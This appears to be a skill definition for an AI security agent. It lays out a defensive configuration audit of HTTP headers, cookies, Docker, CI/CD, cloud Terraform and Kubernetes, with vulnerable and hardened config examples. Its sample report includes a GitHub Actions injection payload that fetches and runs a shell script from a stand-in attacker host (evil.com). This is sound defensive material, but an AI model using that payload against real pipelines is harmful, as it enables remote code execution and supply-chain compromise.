| name | perseus-config |
| description | Security configuration analysis (Headers, CORS, Docker, CI/CD, Cloud, K8s) |
Perseus Configuration Specialist
Context & Authorization
IMPORTANT: This skill performs security configuration analysis on the user's own codebase. This is defensive security testing to ensure proper security hardening.
Authorization: The user owns this codebase and has explicitly requested this specialized analysis.
Multi-Language & Platform Support
| Category | Technologies |
|---|
| Web Frameworks | Express, Fastify, Next.js, Go/Gin, PHP/Laravel, Python/FastAPI, Rust/Actix |
| Containers | Docker, Podman, containerd |
| Orchestration | Kubernetes, Docker Compose, Docker Swarm |
| CI/CD | GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure DevOps |
| Cloud | AWS, GCP, Azure, DigitalOcean, Vercel, Netlify |
| IaC | Terraform, Pulumi, CloudFormation, Ansible |
Overview
This specialist skill analyzes security configuration including HTTP headers, TLS settings, CORS policies, container security, CI/CD pipelines, and cloud configurations.
When to Use: As part of any security assessment, or specifically when reviewing deployment configuration.
Goal: Ensure all security configurations follow best practices and don't introduce vulnerabilities.
Engagement Mode Compatibility
| Mode | Specialist Behavior |
|---|
PRODUCTION_SAFE | Configuration and manifest analysis with passive verification |
STAGING_ACTIVE | Controlled config validation with limited active checks |
LAB_FULL | Broad environment hardening validation in lab |
LAB_RED_TEAM | Defensive stress simulation for infra misconfig chains in isolated lab |
Safety Gates (Required)
- Read
deliverables/engagement_profile.md before active infra validation.
- Default to
PRODUCTION_SAFE if engagement mode is missing.
- Enforce kill-switch thresholds and stop on environment instability.
- Never modify live infrastructure state without explicit approval.
Configuration Risks Covered
| Risk | Description | Impact |
|---|
| Missing Security Headers | No CSP, HSTS, X-Frame-Options | XSS, clickjacking |
| CORS Misconfiguration | Overly permissive origins | Data theft |
| Insecure Cookies | Missing Secure, HttpOnly, SameSite | Session hijacking |
| Debug Mode | Production debug enabled | Info disclosure |
| Docker Misconfig | Root user, privileged mode | Container escape |
| CI/CD Secrets | Exposed secrets, injection | Supply chain attack |
| Cloud Misconfig | Public buckets, open security groups | Data breach |
| K8s Insecurity | No RBAC, privileged pods | Cluster compromise |
Execution Instructions
Step 0: Mode & Scope Alignment
- Load mode/scope/limits from
deliverables/engagement_profile.md.
- Respect
deliverables/verification_scope.md when present.
- Keep production checks read-only and non-disruptive.
Phase 1: HTTP Security Headers (3 Parallel Agents)
-
CSP Analyst:
- "Find Content Security Policy configuration across frameworks."
Framework-Specific:
app.use(helmet.contentSecurityPolicy({ directives: {...} }));
headers: [{ key: 'Content-Security-Policy', value: '...' }]
c.Header("Content-Security-Policy", "default-src 'self'")
CSP_DEFAULT_SRC = ("'self'",)
response.headers["Content-Security-Policy"] = "..."
header('Content-Security-Policy: default-src \'self\'');
-
Security Headers Analyst:
- "Check for all security headers across languages."
Headers to Check:
| Header | Purpose | Recommended Value |
|---|
| Strict-Transport-Security | Force HTTPS | max-age=31536000; includeSubDomains |
| X-Frame-Options | Prevent clickjacking | DENY or SAMEORIGIN |
| X-Content-Type-Options | Prevent MIME sniffing | nosniff |
| Referrer-Policy | Control referrer | strict-origin-when-cross-origin |
| Permissions-Policy | Limit browser features | Disable unused features |
-
Cookie Security Analyst:
- "Find all cookie setting operations across languages."
Patterns:
res.cookie('session', value, { secure: true, httpOnly: true, sameSite: 'strict' });
http.SetCookie(w, &http.Cookie{Secure: true, HttpOnly: true, SameSite: http.SameSiteStrictMode})
setcookie('session', $value, ['secure' => true, 'httponly' => true, 'samesite' => 'Strict']);
response.set_cookie(key, value, secure=True, httponly=True, samesite='strict')
Phase 2: Docker Security Analysis (4 Parallel Agents)
-
Dockerfile Analyst:
- "Analyze all Dockerfiles for security issues."
Issues to Find:
# VULNERABLE - Running as root
FROM node:18
COPY . .
CMD ["node", "app.js"]
# SAFE - Non-root user
FROM node:18
RUN addgroup -S app && adduser -S app -G app
USER app
COPY --chown=app:app . .
CMD ["node", "app.js"]
Checks:
- Running as root (no USER directive)
- Using
latest tag
- Secrets in build args or ENV
- Unnecessary packages installed
- No health check
- Exposed unnecessary ports
-
Docker Compose Analyst:
- "Analyze docker-compose files for security issues."
Issues:
services:
app:
privileged: true
network_mode: host
volumes:
- /:/host
cap_add:
- ALL
services:
app:
read_only: true
security_opt:
- no-new-privileges:true
cap_drop:
- ALL
-
Container Secrets Analyst:
- "Check for secrets in container configurations."
Patterns:
# VULNERABLE
ENV DATABASE_PASSWORD=secret123
ARG API_KEY=sk-xxx
COPY .env /app/.env
-
Image Security Analyst:
- "Check base image security and update status."
Checks:
- Using official images
- Pinned versions (not latest)
- Multi-stage builds for smaller attack surface
- Distroless/Alpine for minimal images
Phase 3: CI/CD Security Analysis (4 Parallel Agents)
-
GitHub Actions Analyst:
- "Analyze GitHub Actions workflows for security issues."
Critical Issues:
- run: echo "${{ github.event.issue.title }}"
- run: echo "$TITLE"
env:
TITLE: ${{ github.event.issue.title }}
on: pull_request_target
steps:
- uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }}
- run: curl -H "Authorization: ${{ secrets.API_KEY }}" $URL
Checks:
- Command injection via event data
- Secrets exposure in logs
- Overly permissive permissions
- Using unverified actions
- pull_request_target misuse
-
GitLab CI Analyst:
- "Analyze .gitlab-ci.yml for security issues."
Issues:
script:
- echo $CI_JOB_TOKEN
- curl "$USER_INPUT"
-
Secrets Management Analyst:
- "Check how secrets are managed in CI/CD."
Checks:
- Secrets in workflow files
- Secrets in repository
- Secrets passed to forks
- Secrets in build logs
- Environment variable exposure
-
Pipeline Permissions Analyst:
- "Check CI/CD permissions and access controls."
GitHub Actions Permissions:
permissions: write-all
permissions:
contents: read
pull-requests: write
Phase 4: Cloud Configuration Analysis (4 Parallel Agents)
-
AWS Configuration Analyst:
- "Analyze AWS configurations for security issues."
Check Files:
*.tf (Terraform)
template.yaml (CloudFormation)
serverless.yml
.aws/ configs
Issues:
# VULNERABLE - Public S3
resource "aws_s3_bucket" "data" {
acl = "public-read"
}
# VULNERABLE - Open security group
resource "aws_security_group" "web" {
ingress {
from_port = 0
to_port = 65535
cidr_blocks = ["0.0.0.0/0"]
}
}
# VULNERABLE - Hardcoded credentials
provider "aws" {
access_key = "AKIA..."
secret_key = "..."
}
-
GCP/Azure Configuration Analyst:
- "Analyze GCP and Azure configurations."
GCP Issues:
# VULNERABLE - Public GCS
resource "google_storage_bucket_iam_member" "public" {
member = "allUsers"
role = "roles/storage.objectViewer"
}
-
Serverless Configuration Analyst:
- "Analyze serverless configurations (Vercel, Netlify, AWS Lambda)."
Check:
- Environment variables in config
- Overly permissive IAM roles
- Public function URLs
- Missing authentication
-
Infrastructure as Code Analyst:
- "Check Terraform, Pulumi, Ansible for security issues."
Terraform Issues:
# VULNERABLE - No encryption
resource "aws_ebs_volume" "data" {
encrypted = false
}
# VULNERABLE - Default VPC
resource "aws_instance" "web" {
# No VPC specified, uses default
}
Phase 5: Kubernetes Security Analysis (4 Parallel Agents)
-
Pod Security Analyst:
- "Analyze Kubernetes pod/deployment manifests."
Issues:
spec:
containers:
- name: app
securityContext:
privileged: true
runAsRoot: true
allowPrivilegeEscalation: true
volumeMounts:
- mountPath: /host
name: host-root
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
containers:
- name: app
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop: ["ALL"]
-
RBAC Analyst:
- "Analyze Kubernetes RBAC configurations."
Issues:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
subjects:
- kind: ServiceAccount
name: default
roleRef:
kind: ClusterRole
name: cluster-admin
-
Network Policy Analyst:
- "Check Kubernetes network policies."
Issues:
- No network policies (all pods can communicate)
- Overly permissive ingress/egress
- Missing pod selectors
-
Secrets & ConfigMap Analyst:
- "Analyze Kubernetes secrets management."
Issues:
apiVersion: v1
kind: Secret
data:
password: cGFzc3dvcmQ=
Phase 6: Application Configuration (3 Parallel Agents)
-
Debug Mode Analyst:
- "Check for debug/development mode in production configs."
Patterns:
DEBUG = true
NODE_ENV = 'development'
DEBUG = True
app.run(debug=True)
APP_DEBUG=true
gin.SetMode(gin.DebugMode)
-
Error Handling Analyst:
- "Check error responses for information disclosure."
-
Environment Variables Analyst:
- "Check .env files and environment variable handling."
Issues:
- .env files in repository
- Secrets in .env.example
- Missing .env in .gitignore
- Secrets logged
Output Requirements
Create deliverables/config_security_analysis.md:
# Security Configuration Analysis
## Summary
| Category | Checks | Pass | Fail | Critical |
|----------|--------|------|------|----------|
| HTTP Headers | X | Y | Z | W |
| Cookies | X | Y | Z | W |
| Docker | X | Y | Z | W |
| CI/CD | X | Y | Z | W |
| Cloud (AWS/GCP/Azure) | X | Y | Z | W |
| Kubernetes | X | Y | Z | W |
| App Config | X | Y | Z | W |
## Technologies Detected
- Framework: [e.g., Next.js, Go/Gin]
- Container: Docker, Kubernetes
- CI/CD: GitHub Actions
- Cloud: AWS
## Critical Findings
### [CONFIG-001] GitHub Actions Command Injection
**Severity:** Critical
**Location:** `.github/workflows/pr.yml:23`
**Vulnerable Code:**
```yaml
- run: |
echo "PR Title: ${{ github.event.pull_request.title }}"
Attack: Attacker creates PR with title: "; curl evil.com/shell.sh | sh #
Remediation:
- run: echo "PR Title: $TITLE"
env:
TITLE: ${{ github.event.pull_request.title }}
[CONFIG-002] Privileged Docker Container
Severity: Critical
Location: docker-compose.yml:15
Vulnerable Code:
services:
app:
privileged: true
Impact: Container escape, host compromise
[CONFIG-003] Public S3 Bucket
Severity: Critical
Location: terraform/storage.tf:8
Docker Security Checklist
| Check | Status | File |
|---|
| Non-root user | FAIL | Dockerfile |
| No secrets in image | PASS | - |
| Pinned base image | FAIL | Dockerfile |
| Read-only filesystem | FAIL | docker-compose.yml |
| Dropped capabilities | FAIL | docker-compose.yml |
CI/CD Security Checklist
| Check | Status | File |
|---|
| No command injection | FAIL | pr.yml |
| Minimal permissions | FAIL | build.yml |
| No secrets in logs | PASS | - |
| Verified actions only | WARN | deploy.yml |
Kubernetes Security Checklist
| Check | Status | File |
|---|
| Non-root pods | FAIL | deployment.yaml |
| Network policies | MISSING | - |
| RBAC configured | WARN | rbac.yaml |
| Secrets encrypted | FAIL | secrets.yaml |
Cloud Security Checklist
| Check | Status | Resource |
|---|
| No public buckets | FAIL | S3: data-bucket |
| Encrypted storage | PASS | EBS volumes |
| Restricted security groups | FAIL | sg-web |
| No hardcoded credentials | PASS | - |
Recommendations
Immediate Actions
- Fix GitHub Actions command injection
- Remove privileged mode from containers
- Make S3 bucket private
- Add USER directive to Dockerfile
Security Hardening
securityContext:
runAsNonRoot: true
runAsUser: 1000
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop: ["ALL"]
permissions:
contents: read
pull-requests: write
**Next Step:** Configuration issues are typically binary (secure or not) and don't require exploit verification.